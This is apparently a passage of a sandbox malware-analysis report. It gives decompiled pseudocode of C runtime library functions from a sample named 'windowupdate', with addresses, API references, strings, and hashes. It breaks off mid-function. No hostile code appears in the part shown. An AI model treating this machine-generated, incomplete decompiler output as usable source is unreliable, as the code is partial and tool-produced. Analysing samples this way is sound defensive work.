                      			E00D31CF0(void* __ebx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				char _v2060;
				signed int _v2068;
				signed int _v2072;
				char* _v2076;
				char _v2084;
				char _v2612;
				char _v2616;
				signed int _t46;
				signed int _t47;
				void* _t49;
				signed int _t54;
				void* _t56;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t76;
				char* _t95;
				void* _t97;
				void* _t102;
				void* _t103;
				void* _t104;
				signed int _t105;
				void* _t106;
				void* _t107;
				void* _t110;

				_t104 = __esi;
				_t95 = __edx;
				_t70 = __ebx;
				_t102 =  &_v2616;
				memset(_t102, 0xcccccccc, 0x28d << 2);
				_t107 = _t106 + 0xc;
				_t103 = _t102 + 0x28d;
				_t46 =  *0xdf600c; // 0x71e60372
				_t47 = _t46 ^ _t105;
				_v8 = _t47;
				if( *0xf2368c == 0xffffffff) {
					L3:
					L17:
					E00DC14C0(_t105, 0xd31f28);
					_t49 = _t47;
					_t97 = _t95;
					return E00DC1520(E00D47280(_t49, _t70, _v8 ^ _t105, _t97, _t103, _t104), _t105 - _t107 + 0xa34);
				}
				_t47 =  *0xf2368c;
				if(_t47 < _a16) {
					goto L3;
				}
				_t76 =  *0xf1f2f8; // 0xffffffff
				_t77 = _t76 & _a12;
				if((_t76 & _a12) != 0) {
					_t95 =  &_v2060;
					E00D4AF80(_t103, _t95, 0, 0x800);
					_v2068 = 0;
					_t54 = E00D31CA0(_t77, _a12);
					_t110 = _t107 + 0x10;
					_v2072 = _t54;
					__eflags = _v2072;
					if(__eflags == 0) {
						_t47 = E00D31490(__eflags,  &_v2060, 0x400, L"%u - ", _a12);
						_t107 = _t110 + 0x10;
						_v2068 = _t47;
						__eflags = _v2068 - 0xffffffff;
						if(_v2068 != 0xffffffff) {
							L10:
							_t56 = E00D85A70(_a20);
							_t107 = _t107 + 4;
							_t22 = _v2068 + 1; // 0x1
							_t95 = _t56 + _t22;
							_v2076 = _t95;
							E00D3F150( &_v2084);
							__eflags = E00D3F0C0( &_v2084, _t95, __eflags, _v2076) & 0x000000ff;
							if(__eflags != 0) {
								 *((short*)(E00D3F180( &_v2084))) = 0;
								_push(_a20);
								_t95 = _v2076;
								_t63 = E00D31490(__eflags, E00D3F180( &_v2084), _t95, L"%ls%ls",  &_v2060);
								_t107 = _t107 + 0x14;
								__eflags = _t63 - 0xffffffff;
								if(__eflags != 0) {
									E00D4AF80(_t103,  &_v2612, 0, 0x208);
									_t95 =  &_v2612;
									_t66 = E00D31490(__eflags, _t95, 0x104, L"%hs", _a4);
									_t107 = _t107 + 0x1c;
									__eflags = _t66 - 0xffffffff;
									if(__eflags != 0) {
										L00D84930(__eflags, 0,  &_v2612, _a8, 0, "%ls", E00D3F180( &_v2084));
										_t107 = _t107 + 0x18;
										_t47 = E00D322D0( &_v2084, __eflags);
									} else {
										_t47 = E00D322D0( &_v2084, __eflags);
									}
								} else {
									_t47 = E00D322D0( &_v2084, __eflags);
								}
							} else {
								_t47 = E00D322D0( &_v2084, __eflags);
							}
							goto L17;
						}
						goto L17;
					}
					_t95 =  &_v2060;
					_t47 = E00D31490(__eflags, _t95, 0x400, L"%ls - ", _v2072);
					_t107 = _t110 + 0x10;
					_v2068 = _t47;
					__eflags = _v2068 - 0xffffffff;
					if(_v2068 != 0xffffffff) {
						goto L10;
					} else {
						goto L17;
					}
				}
				goto L3;
			}





























                      0x00d31cf0
                      0x00d31cf0
                      0x00d31cf0
                      0x00d31cfa
                      0x00d31d0a
                      0x00d31d0a
                      0x00d31d0a
                      0x00d31d0c
                      0x00d31d11
                      0x00d31d13
                      0x00d31d1d
                      0x00d31d34
                      0x00d31ef9
                      0x00d31f03
                      0x00d31f08
                      0x00d31f09
                      0x00d31f25
                      0x00d31f25
                      0x00d31d1f
                      0x00d31d27
                      0x00000000
                      0x00000000
                      0x00d31d29
                      0x00d31d2f
                      0x00d31d32
                      0x00d31d40
                      0x00d31d47
                      0x00d31d4f
                      0x00d31d5d
                      0x00d31d62
                      0x00d31d65
                      0x00d31d6b
                      0x00d31d72
                      0x00d31dbf
                      0x00d31dc4
                      0x00d31dc7
                      0x00d31dcd
                      0x00d31dd4
                      0x00d31ddb
                      0x00d31ddf
                      0x00d31de4
                      0x00d31ded
                      0x00d31ded
                      0x00d31df1
                      0x00d31dfd
                      0x00d31e17
                      0x00d31e19
                      0x00d31e40
                      0x00d31e47
                      0x00d31e54
                      0x00d31e67
                      0x00d31e6c
                      0x00d31e6f
                      0x00d31e72
                      0x00d31e8f
                      0x00d31ea5
                      0x00d31eac
                      0x00d31eb1
                      0x00d31eb4
                      0x00d31eb7
                      0x00d31ee6
                      0x00d31eeb
                      0x00d31ef4
                      0x00d31eb9
                      0x00d31ebf
                      0x00d31ebf
                      0x00d31e74
                      0x00d31e7a
                      0x00d31e7a
                      0x00d31e1b
                      0x00d31e21
                      0x00d31e21
                      0x00000000
                      0x00d31e19
                      0x00000000
                      0x00d31dd6
                      0x00d31d85
                      0x00d31d8c
                      0x00d31d91
                      0x00d31d94
                      0x00d31d9a
                      0x00d31da1
                      0x00000000
                      0x00d31da3
                      0x00000000
                      0x00d31da3
                      0x00d31da1
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %hs$%ls$%ls - $%ls%ls$%u -
                      • API String ID: 3912913270-3378233065
                      • Opcode ID: c89e31a6203e3ed4f93f8865c1ed96357cc6b6c606b1fc1b4769cf8a5b869f42
                      • Instruction ID: 5695af2de730c49f3be5934dfaeca16be278000777229b6878fe02e4de23ea8b
                      • Opcode Fuzzy Hash: c89e31a6203e3ed4f93f8865c1ed96357cc6b6c606b1fc1b4769cf8a5b869f42
                      • Instruction Fuzzy Hash: A351A27A9002199BCB14FB14DC52BEA7378FF04314F0086A8F55557192EE716A85CFF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D57390 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 127COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D57390(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				char _v52;
				signed int _v56;
				char _v60;
				char* _t46;
				intOrPtr _t50;
				char* _t51;
				char _t60;
				char _t64;
				signed int _t68;
				char _t69;
				char _t71;
				intOrPtr _t77;
				char* _t94;
				intOrPtr _t96;
				intOrPtr _t98;
				intOrPtr _t99;
				signed int _t104;
				void* _t105;
				void* _t106;

				_t46 =  *0xf20640; // 0x0
				if( *_t46 == 0) {
					L20:
					E00D4F3F0(_a4);
					return _a4;
				}
				_t94 =  *0xf20640; // 0x0
				if( *_t94 != 0x5f) {
					goto L20;
				}
				_t77 =  *0xf20640; // 0x0
				if( *((char*)(_t77 + 1)) == 0) {
					goto L20;
				}
				_t50 =  *0xf20640; // 0x0
				if( *((char*)(_t50 + 1)) > 0x44) {
					goto L20;
				}
				_t96 =  *0xf20640; // 0x0
				 *0xf20640 = _t96 + 1;
				_t51 =  *0xf20640; // 0x0
				_v20 =  *_t51 - 0x41;
				_t98 =  *0xf20640; // 0x0
				_t99 = _t98 + 1;
				 *0xf20640 = _t99;
				_v8 = _v20;
				if(_v8 > 3) {
					E00D4F350(_a4, 2);
					return _a4;
				}
				E00D4F3F0( &_v28);
				if(E00D52230( &_v28) == 0) {
					L18:
					E00D4F240(_a4,  &_v28);
					return _a4;
				}
				E00D4FDE0( &_v28, 0x20);
				_t60 = E00D50130( &_v28, 0xf);
				_t106 = _t105 + 4;
				_v36 = _t60;
				_v32 = _t99;
				E00D4FCA0( &_v28,  &_v36);
				while(_v8 != 0) {
					_t104 =  !_v8 + 0x00000001 & _v8;
					_v16 = _t104;
					_v12 = _v16;
					if(_v12 == 1) {
						_t64 = E00D50060("cpu", 3);
						_t106 = _t106 + 8;
						_v44 = _t64;
						_v40 = _t104;
						E00D4FCA0( &_v28,  &_v44);
						L14:
						_t68 =  !_v16 & _v8;
						_v8 = _t68;
						if(_t68 != 0) {
							_t69 = E00D50060(", ", 2);
							_t106 = _t106 + 8;
							_v60 = _t69;
							_v56 = _t104;
							E00D4FCA0( &_v28,  &_v60);
						}
						continue;
					}
					if(_v12 == 2) {
						_t71 = E00D50060("amp", 3);
						_t106 = _t106 + 8;
						_v52 = _t71;
						_v48 = _t104;
						_t104 =  &_v52;
						E00D4FCA0( &_v28, _t104);
						goto L14;
					}
					E00D4F350(_a4, 2);
					return _a4;
				}
				E00D4FDE0( &_v28, 0x29);
				goto L18;
			}
































                      0x00d57396
                      0x00d573a0
                      0x00d57535
                      0x00d57538
                      0x00000000
                      0x00d5753d
                      0x00d573a6
                      0x00d573b2
                      0x00000000
                      0x00000000
                      0x00d573b8
                      0x00d573c4
                      0x00000000
                      0x00000000
                      0x00d573ca
                      0x00d573d6
                      0x00000000
                      0x00000000
                      0x00d573dc
                      0x00d573e5
                      0x00d573eb
                      0x00d573f6
                      0x00d573f9
                      0x00d573ff
                      0x00d57402
                      0x00d5740b
                      0x00d57412
                      0x00d57529
                      0x00000000
                      0x00d5752e
                      0x00d5741b
                      0x00d57427
                      0x00d57511
                      0x00d57518
                      0x00000000
                      0x00d5751d
                      0x00d57432
                      0x00d57439
                      0x00d5743e
                      0x00d57441
                      0x00d57444
                      0x00d5744e
                      0x00d57453
                      0x00d57465
                      0x00d57468
                      0x00d5746e
                      0x00d57475
                      0x00d57486
                      0x00d5748b
                      0x00d5748e
                      0x00d57491
                      0x00d5749b
                      0x00d574d4
                      0x00d574d9
                      0x00d574dc
                      0x00d574df
                      0x00d574e8
                      0x00d574ed
                      0x00d574f0
                      0x00d574f3
                      0x00d574fd
                      0x00d574fd
                      0x00000000
                      0x00d57502
                      0x00d5747b
                      0x00d574a9
                      0x00d574ae
                      0x00d574b1
                      0x00d574b4
                      0x00d574b7
                      0x00d574be
                      0x00000000
                      0x00d574be
                      0x00d574ca
                      0x00000000
                      0x00d574cf
                      0x00d5750c
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5741B
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 00D57420
                      • DName::operator+=.LIBCMTD ref: 00D57432
                        • Part of subcall function 00D4FDE0: DName::isValid.LIBCMTD ref: 00D4FDEC
                        • Part of subcall function 00D4FDE0: DName::isEmpty.LIBCMTD ref: 00D4FE00
                        • Part of subcall function 00D50130: UnDecorator::doUnderScore.LIBCMTD ref: 00D50136
                        • Part of subcall function 00D4FCA0: DName::isValid.LIBCMTD ref: 00D4FCAC
                        • Part of subcall function 00D4FCA0: DName::isEmpty.LIBCMTD ref: 00D4FCC1
                      • DName::DName.LIBVCRUNTIMED ref: 00D574CA
                        • Part of subcall function 00D4FCA0: DName::append.LIBCMTD ref: 00D4FD24
                      • DName::operator+=.LIBCMTD ref: 00D5750C
                      • Mailbox.LIBCMTD ref: 00D57518
                      • DName::DName.LIBVCRUNTIMED ref: 00D57529
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D57538
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name::is$Decorator::doEmptyIterator_baseIterator_base::_NameName::Name::operator+=Validstd::_$KeywordsMailboxName::appendScoreUnder
                      • String ID: amp$cpu
                      • API String ID: 4042095736-2542064945
                      • Opcode ID: 9da89e5ce3c21d2740d484780f0f924473764b626bcade640cdb8428cd22eac5
                      • Instruction ID: 515f4f6050d090d60d3f95d108e00f0635f9da9f5f57514dabcc94649025483b
                      • Opcode Fuzzy Hash: 9da89e5ce3c21d2740d484780f0f924473764b626bcade640cdb8428cd22eac5
                      • Instruction Fuzzy Hash: E9512471D04118DBCF15DFA4E896AEDBBB1FF44342F248069ED056B252EB30AA49DB70
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D37C00 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 125COMMON
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00D37C00(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				char _v32;
				char _v40;
				char _v44;
				char _v48;
				void* _t43;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t59;
				void* _t73;
				signed int _t100;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;

				_t107 = __esi;
				_t100 = __edx;
				_t73 = __ebx;
				_t105 =  &_v48;
				memset(_t105, 0xcccccccc, 0xb << 2);
				_t110 = _t109 + 0xc;
				_t106 = _t105 + 0xb;
				if(_a8 == 0) {
					L2:
					_t43 = L00D84930(_t114, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0xe3, 0, "%ls", L"lpszKey != 0 && lpszItem != 0");
					_t110 = _t110 + 0x18;
					if(_t43 == 1) {
						asm("int3");
					}
					L4:
					if(_a8 == 0 || _a12 == 0) {
						_t44 = 0x80070057;
					} else {
						_v8 = 0x8007000e;
						E00D32AF0(_a4 + 0x10);
						_t49 = E00D82E00(_a8);
						_t110 = _t110 + 4;
						_v12 = _t49 + 1;
						E00D3EC30( &_v20);
						_t100 = _v12;
						__eflags = E00D3EB10(_t73,  &_v20, _t106, _t107, _t100) & 0x000000ff;
						if(__eflags != 0) {
							E00D326F0(_t73, _t106, _t107, __eflags, E00D3EBF0( &_v20), _v12, _a8);
							_t59 = E00D82E00(_a12);
							_t110 = _t110 + 0x10;
							_v12 = _t59 + 1;
							E00D3EC30( &_v32);
							_t100 = E00D3EB10(_t73,  &_v32, _t106, _t107, _v12) & 0x000000ff;
							__eflags = _t100;
							if(__eflags != 0) {
								E00D326F0(_t73, _t106, _t107, __eflags, E00D3EBF0( &_v32), _v12, _a12);
								_t110 = _t110 + 0xc;
								_v40 = E00D3EBF0( &_v32);
								_v44 = E00D3EBF0( &_v20);
								_t100 =  &_v40;
								__eflags = E00D3E340(_a4 + 4,  &_v44, _t100);
								if(__eflags != 0) {
									_v8 = 0;
									E00D3EAE0( &_v20);
									E00D3EAE0( &_v32);
								}
							}
							E00D3EC00( &_v32, __eflags);
						}
						__eflags = _a4 + 0x10;
						E00D32B00(_a4 + 0x10);
						_v48 = _v8;
						E00D3EC00( &_v20, __eflags);
						_t44 = _v48;
					}
					_push(_t100);
					E00DC14C0(_t108, 0xd37d8c);
					_t46 = _t44;
					return E00DC1520(_t46, _t108 - _t110 + 0x2c);
				}
				_t114 = _a12;
				if(_a12 != 0) {
					goto L4;
				}
				goto L2;
			}























                      0x00d37c00
                      0x00d37c00
                      0x00d37c00
                      0x00d37c07
                      0x00d37c14
                      0x00d37c14
                      0x00d37c14
                      0x00d37c1a
                      0x00d37c22
                      0x00d37c3a
                      0x00d37c3f
                      0x00d37c45
                      0x00d37c47
                      0x00d37c47
                      0x00d37c48
                      0x00d37c4c
                      0x00d37c54
                      0x00d37c5e
                      0x00d37c5e
                      0x00d37c6b
                      0x00d37c74
                      0x00d37c79
                      0x00d37c7f
                      0x00d37c85
                      0x00d37c8a
                      0x00d37c99
                      0x00d37c9b
                      0x00d37cb2
                      0x00d37cbe
                      0x00d37cc3
                      0x00d37cc9
                      0x00d37ccf
                      0x00d37ce0
                      0x00d37ce3
                      0x00d37ce5
                      0x00d37cf8
                      0x00d37cfd
                      0x00d37d08
                      0x00d37d13
                      0x00d37d16
                      0x00d37d29
                      0x00d37d2b
                      0x00d37d2d
                      0x00d37d37
                      0x00d37d3f
                      0x00d37d3f
                      0x00d37d2b
                      0x00d37d47
                      0x00d37d47
                      0x00d37d4f
                      0x00d37d52
                      0x00d37d5a
                      0x00d37d60
                      0x00d37d65
                      0x00d37d65
                      0x00d37d68
                      0x00d37d72
                      0x00d37d77
                      0x00d37d87
                      0x00d37d87
                      0x00d37c1c
                      0x00d37c20
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 00D37C27
                      • lpszKey != 0 && lpszItem != 0, xrefs: 00D37C22
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D37C33
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module__crt_unique_heap_ptr_strlen$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h$lpszKey != 0 && lpszItem != 0
                      • API String ID: 4051287597-3321575645
                      • Opcode ID: 9b5b684938d82ebdf8502f2c2be77d30fe4f16a483f2ace503474d4d8c5c704b
                      • Instruction ID: a586002ee168b3f920dd9007b403ee609a4491f3dee209fd4676490fbe2e2cd5
                      • Opcode Fuzzy Hash: 9b5b684938d82ebdf8502f2c2be77d30fe4f16a483f2ace503474d4d8c5c704b
                      • Instruction Fuzzy Hash: F5412EB6D00209ABCB15EF94D852BEEB374FF54300F148529E5166B2C2EA359A44CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC15E0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 79COMMON
                      Download Yara Rule
                      C-Code - Quality: 46%
                      			E00DC15E0(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v28;
				char _v80;
				char _v324;
				intOrPtr _v328;
				void* __ebx;
				void* __edi;
				signed int _t18;
				signed int _t30;
				intOrPtr _t36;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t46;

				_t44 = __esi;
				_t37 = __ecx;
				_t18 =  *0xdf600c; // 0x71e60372
				_v8 = _t18 ^ _t46;
				_t20 = _a4;
				_t36 = _a8;
				_t43 =  *0xf1f3e8; // 0x1
				_v328 = _a4;
				if(_t43 == 0xffffffff) {
					L4:
					__eflags = _v8 ^ _t46;
					return E00D47280(_t20, _t36, _v8 ^ _t46, _t42, _t43, _t44);
				} else {
					if(_t36 != 0) {
						_push(__esi);
						_t7 = _t36 + 0x20; // 0x21
						_t45 = _t7;
						E00DC17D0(__ecx,  &_v28,  &_v80, _t45,  *((intOrPtr*)(_t36 + 0xc)) - 0x24);
						_push("\n");
						_push( &_v80);
						_push("> ");
						_push( &_v28);
						_push("\nData: <");
						_push(_a12);
						_t30 =  *((intOrPtr*)(_t36 + 0xc)) - 0x24;
						__eflags = _t30;
						_push("\nAllocation number within this function: ");
						_push(_t30);
						_push("\nSize: ");
						_push(_t45);
						_push("\nAddress: 0x");
						E00D44240(_t30,  &_v324, 0xf4, "%s%s%p%s%zd%s%d%s%s%s%s%s", "Stack area around _alloca memory reserved by this function is corrupted");
						_t20 = E00DC1860(_t37, _t42, _v328, _t43, 4,  &_v324);
						_pop(_t44);
						goto L4;
					} else {
						return E00D47280(E00DC1860(__ecx, _t42, _t20, _t43, 4, "Stack area around _alloca memory reserved by this function is corrupted\n"), _t36, _v8 ^ _t46, _t42, _t43, __esi);
					}
				}
			}

















                      0x00dc15e0
                      0x00dc15e0
                      0x00dc15e9
                      0x00dc15f0
                      0x00dc15f3
                      0x00dc15f7
                      0x00dc15fb
                      0x00dc1601
                      0x00dc160a
                      0x00dc16b6
                      0x00dc16ba
                      0x00dc16c5
                      0x00dc1610
                      0x00dc1612
                      0x00dc1638
                      0x00dc163c
                      0x00dc163c
                      0x00dc1649
                      0x00dc164e
                      0x00dc1656
                      0x00dc1657
                      0x00dc165f
                      0x00dc1663
                      0x00dc1668
                      0x00dc166b
                      0x00dc166b
                      0x00dc166e
                      0x00dc1673
                      0x00dc1674
                      0x00dc1679
                      0x00dc167a
                      0x00dc1695
                      0x00dc16ad
                      0x00dc16b5
                      0x00000000
                      0x00dc1614
                      0x00dc1634
                      0x00dc1634
                      0x00dc1612

                      APIs
                      • failwithmessage.LIBCMTD ref: 00DC161D
                        • Part of subcall function 00DC1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00DC18C1
                        • Part of subcall function 00DC1860: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000000), ref: 00DC18E0
                        • Part of subcall function 00DC1860: DebuggerProbe.LIBCMTD ref: 00DC18FA
                        • Part of subcall function 00DC1860: DebuggerRuntime.LIBCMTD ref: 00DC1916
                        • Part of subcall function 00DC1860: IsDebuggerPresent.KERNEL32 ref: 00DC193F
                      • _getMemBlockDataString.LIBCMTD ref: 00DC1649
                      • failwithmessage.LIBCMTD ref: 00DC16AD
                      Strings
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 00DC1614
                      • Address: 0x, xrefs: 00DC167A
                      • %s%s%p%s%zd%s%d%s%s%s%s%s, xrefs: 00DC1684
                      • Data: <, xrefs: 00DC1663
                      • Size: , xrefs: 00DC1674
                      • Stack area around _alloca memory reserved by this function is corrupted, xrefs: 00DC167F
                      • Allocation number within this function: , xrefs: 00DC166E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Debugger$ByteCharMultiWidefailwithmessage$BlockDataPresentProbeRuntimeString_get
                      • String ID: Address: 0x$Allocation number within this function: $Data: <$Size: $%s%s%p%s%zd%s%d%s%s%s%s%s$Stack area around _alloca memory reserved by this function is corrupted$Stack area around _alloca memory reserved by this function is corrupted
                      • API String ID: 4067135985-3301296223
                      • Opcode ID: f06d28cd1556c8e9a29b7e6080a75c8f9df26ae438374bc1d0f6145c6d161fe7
                      • Instruction ID: f50e7e04bd8f6544015057618f04a2db80679faa1ca78a2d11b2abcf806f4a52
                      • Opcode Fuzzy Hash: f06d28cd1556c8e9a29b7e6080a75c8f9df26ae438374bc1d0f6145c6d161fe7
                      • Instruction Fuzzy Hash: 5921AF76A4020CBFCB10DA98DC82EFE7BBCEF09714F454155BA08A7582D670A90886B0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D95AF0 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 265COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 93%
                      			E00D95AF0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, char* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v96;
				intOrPtr _t102;
				long _t106;
				void* _t111;
				void* _t125;
				void* _t142;
				void* _t145;
				intOrPtr _t167;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;

				_t180 = __esi;
				_t179 = __edi;
				_t145 = __ebx;
				if(_a8 == 0 && _a12 > 0) {
					if(_a4 != 0) {
						 *_a4 = 0;
					}
					return 0;
				}
				__eflags = _a4;
				if(_a4 != 0) {
					_t146 = _a4;
					 *_a4 = 0xffffffff;
				}
				__eflags = _a12 - 0x7fffffff;
				if(_a12 > 0x7fffffff) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				_v16 = _v12;
				__eflags = _v16;
				if(__eflags == 0) {
					_t142 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\convert\\wctomb.cpp", 0x34, 0, L"%ls", L"destination_count <= INT_MAX");
					_t181 = _t181 + 0x18;
					__eflags = _t142 - 1;
					if(_t142 == 1) {
						asm("int3");
					}
				}
				__eflags = _v16;
				if(_v16 != 0) {
					L00D66CC0(_t145,  &_v96, _t180, _a20);
					_t167 =  *((intOrPtr*)(E00D67A60( &_v96)));
					__eflags =  *((intOrPtr*)(_t167 + 8)) - 0xfde9;
					if( *((intOrPtr*)(_t167 + 8)) != 0xfde9) {
						_t151 =  *((intOrPtr*)(E00D67A60( &_v96)));
						__eflags =  *((intOrPtr*)(_t151 + 0xbadc4d));
						if( *((intOrPtr*)(_t151 + 0xbadc4d)) != 0) {
							_v32 = 0;
							_t154 =  *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v96))) + 8));
							_t102 = E00DA0A90( *((intOrPtr*)( *((intOrPtr*)(E00D67A60( &_v96))) + 8)), 0,  &_a16, 1, _a8, _a12, 0,  &_v32);
							_t182 = _t181 + 0x20;
							_v8 = _t102;
							__eflags = _v8;
							if(_v8 == 0) {
								L42:
								__eflags = _v8;
								if(_v8 != 0) {
									L55:
									 *((intOrPtr*)(L00D82F70(_t154))) = 0x2a;
									_v68 = 0x2a;
									E00D67230( &_v96);
									return _v68;
								}
								_t106 = GetLastError();
								__eflags = _t106 - 0x7a;
								if(_t106 != 0x7a) {
									goto L55;
								}
								__eflags = _a8;
								if(_a8 != 0) {
									__eflags = _a12;
									if(_a12 > 0) {
										E00D4AF80(_t179, _a8, 0, _a12);
										_t182 = _t182 + 0xc;
									}
								}
								_t154 = 0;
								__eflags = 0;
								if(0 == 0) {
									_v36 = 0;
								} else {
									_v36 = 1;
								}
								_v40 = _v36;
								__eflags = _v40;
								if(__eflags == 0) {
